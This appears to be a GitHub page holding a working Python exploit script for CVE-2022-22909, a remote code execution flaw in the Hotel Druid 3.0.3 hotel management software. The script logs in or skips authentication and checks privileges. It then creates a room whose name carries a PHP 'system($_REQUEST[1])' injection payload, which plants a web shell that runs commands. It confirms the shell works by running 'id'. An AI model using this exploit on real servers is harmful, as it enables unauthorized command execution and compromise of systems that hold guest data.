-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.py
145 lines (131 loc) · 5.73 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#!/usr/bin/python3
import requests
import argparse
def login( target , username = "" , password = "", noauth=False):
login_data = {
"vers_hinc" : "1",
"nome_utente_phpr" : username,
"password_phpr" : password
}
if not noauth:
login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('"> <b>')[0]
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
ret_data = {"token" : token , "anno" : anno}
#print("ret data" + ret_data)
return ret_data
else:
return False
else:
login_req = requests.get(f"{target}/inizio.php" , verify=False )
try:
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
token = ""
ret_data = {"token" : token , "anno" : anno}
return ret_data
except:
return False
def check_privilege(target , anno , token=""):
priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
#print(priv_req.text)
if "Modify" in priv_req.text:
return True
else:
return False
def add_room(target , anno , token=""):
add_room_data = {
"anno": anno,
"id_sessione": token,
"n_app":"{${system($_REQUEST[1])}}",
"crea_app":"SI",
"crea_letti":"",
"n_letti":"",
"tipo_tabella":"appartamenti"
}
add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
#print(add_req.text)
if "has been added" in add_req.text:
return True
else:
return False
def test_code_execution(target):
code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?1=id")
if "uid=" in code_execution_req.text:
return code_execution_req.text.split("\n")[0]
else:
return False
def main():
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
parser = argparse.ArgumentParser()
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
req_args.add_argument("-u" , "--username" , help="Username" , required=False)
req_args.add_argument("-p" , "--password" , help="password", required=False)
req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
args = parser.parse_args()
target = args.target
if target[-1] == "/":
target = target[:-1]
noauth = args.noauth
username = args.username
password = args.password
if noauth == False and (username == None or password == None):
print('[-] Please provide the authentication method.' )
quit()
print(banner)
if not noauth:
print(f"[*] Logging in with the credential {username}:{password}")
login_result = login(username = username , password = password , target = target)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print("[-] Login failed, Check your credential or check if login is required or not .")
quit()
else:
print('[*] Trying to access the Dashboard.')
login_result = login(username = username , password = password , target = target , noauth=True)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
exit()
print("[*] Checking the privilege of the user.")
if check_privilege(target= target , token=token , anno=anno):
print("[+] User has the privilege to add room.")
else:
print("[-] User doesn't have the privilege to add room.")
exit()
print("[*] Adding a new room.")
if add_room(target = target , anno=anno , token=token):
print('[+] Room has been added successfully.')
else:
print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
exit()
print('[*] Testing code exection')
output = test_code_execution(target = target)
if output != False:
print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter '1'.")
print(f'[+] Example : {target}/dati/selectappartamenti.php?1=id')
print(f"[+] Example Output : {output}")
exit()
else:
print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?1=hostname")
exit()
main()